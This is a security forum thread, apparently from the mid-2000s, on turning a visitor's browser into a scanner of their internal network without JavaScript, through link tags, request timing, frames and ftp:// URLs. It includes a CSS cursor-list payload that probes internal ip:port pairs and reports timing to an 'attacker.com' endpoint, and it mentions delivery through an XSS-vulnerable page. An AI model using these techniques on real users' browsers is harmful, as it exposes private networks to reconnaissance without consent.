I've seen some of you are interested in the Grossman's idea, so maybe we could exchange results? I've made a very small test case only, not anything really interesting, but I'll put some comments here for a good start.

1. The link tag seems to work for this in Firefox 2 and IE 7, Opera behaves differently.
2. In IE, you can use e.g. port 1 for time comparison (similar times means host/port down, shorter means host/port up)
3. Using 'http://' protocol prefix for port 21 will always give short times, but you can use 'ftp://x:x@' - the downside is an alert in FF (works fine in IE)

Vaguely off topic, but is there anything embedded that lynx calls? I can't think of anything off the top of my head, but maybe I'm not thinking properly. I know links does call frames so that may be handy, but I can't think of anything for Lynx off hand.

- RSnake
Gotta love it. http://ha.ckers.org

More on the topic: http://ha.ckers.org/blog/20061130/portscanning-without-javascript-part-2/

- RSnake
Gotta love it. http://ha.ckers.org

Still i don't understand the practical use of it.
To my knowledge you can just portscan with PHP alone

/me points back to the ha.ckers blog comments

-maluc

I commented back, heck.

Well, most intranets are on the net also, so you could link a stylesheet to a remote php file to scan back, or a local php if it runs linux/php.

Or am i completely missing the point? ^-^

I think you are sort of missing what we are talking about. Intranets aren't on the Internet, they are non-routable. They are behind firewalls and not pingable from the outside (RFC1918). However, since the user is behind the firewall they can see the addresses for us. PHP and all server side port scanning is unable to see what the client can see. So we are using their browser to do what we would normally be able to do for ourselves if we could route to the IPs.

Network Address Translation (NAT) is a security measure used by firewalls to protect the internal networks by not giving them actual world route-able addresses. So we get the user to see a malicious piece of JavaScript and that JavaScript runs on their computer which is behind the firewall and on the same subnet as the other non-route-able machines and therefore has access to do things we cannot do from a server side scan of the network since all we would see is one filtered IP rather than the machines behind that IP.

- RSnake
Gotta love it. http://ha.ckers.org

Yeah, thanx. i understand that, but where do you show that code to the user?
then you already have access to the intranet, why should you ping ports if your on it already?

that's what i'm missing here.

Ah... no, you show them the code on an external site that you have control over (a myspace page with an XSS vuln or whatever). The JavaScript then attempts to connect to the intranet. Using your browser as the conduit. Cross domain policies don't apply to embedded scripts that are being included, and you can test if they error out or don't. Using an external page you can make a browser scan it's own intranet.

- RSnake
Gotta love it. http://ha.ckers.org

Okay, that explains it better :)

I just though that it was meant that some dude was browsing through his intranet to a site, then you could just ping the living hell out ot him with php ^_^.

Yah, it's a confusing concept. It's something I came up with years ago, when I was first looking at looking glass scripts. I thought it was crazy that I could affect networks through a simple command injection issue. Later I thought of ways that you could build Java ping sweeps. Jeremiah took it to the next level by making a port scanner out of JavaScript (instead of my Java idea). Very cool.

- RSnake
Gotta love it. http://ha.ckers.org

Unfortunately I didn't have too much time to continue those tests, until today.

Because of the low speed of link tag scans, I think it could be divided into very small parts - for example 3-4 hosts/ports per subpage, with current progress stored in session (Ilia Alshanetsky already suggested it).

Unfortunately, the multipart/x-mixed-replace method causes browser status bar to reveal currently scanned addresses, while simply dividing scanning into frames (without multipart/x-mixed-replace) causes Firefox to show only the main domain in status bar (at least for unresponsive hosts - for those responding the local IP shows for just a moment). There is still problem with timeout of unresponsive hosts, but if you have only 3-4 scanning frames on each subpage, it shouldn't be much problem (local IP does not show in status bar, and user causes the scan to continue by going to other subpage).

From what I tried, it doesn't work for IE 6 (don't know how about 7), because it shows anything on the page only after loading all link tags (even those from frames). I'll try to make more tests on IE, maybe there is some way to bypass this problem.

I notice that the cursor property in IE6(don't know about IE7) maybe able to launch a port scanning without javascript. Cursor property let you define a list of cursors and if the browser cannot handle the first cursor, it should attempt to handle the second cursor, etc.
In IE6, all GET requests of the cursor are following the sequence of the cursor list. It try to get the first cursor, if fail, then try to get the second, if fail, then try to get the third one, and so on. Therefore, we can using the time attack method like scanner using link tags in firefox. i.e.:

p.ip1
{
cursor:
url("http://attacker.com/portscan?ip=ip1&port=port1"),
url("ip1:port1"),
url("http://attacker.com/portscan?ip=ip1&port=port2"),
url("ip1:port2"),
url("http://attacker.com/portscan?ip=ip1&port=port3"),
url("ip1:port3"),
url("http://attacker.com/portscan?ip=ip1&port=port4"),
...
pointer
}

p.ip2
{
cursor:
url("http://attacker.com/portscan?ip=ip2&port=port1"),
url("ip2:port1"),
url("http://attacker.com/portscan?ip=ip2&port=port2"),
url("ip2:port2"),
url("http://attacker.com/portscan?ip=ip2&port=port3"),
url("ip2:port3"),
url("http://attacker.com/portscan?ip=ip2&port=port4"),
...
pointer
}

- Hong

Nice work, Hong.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Without testing this thoroughly, are you saying that a correct IP/port will take longer or shorter than an incorrect/invalid IP/port?

- RSnake
Gotta love it. http://ha.ckers.org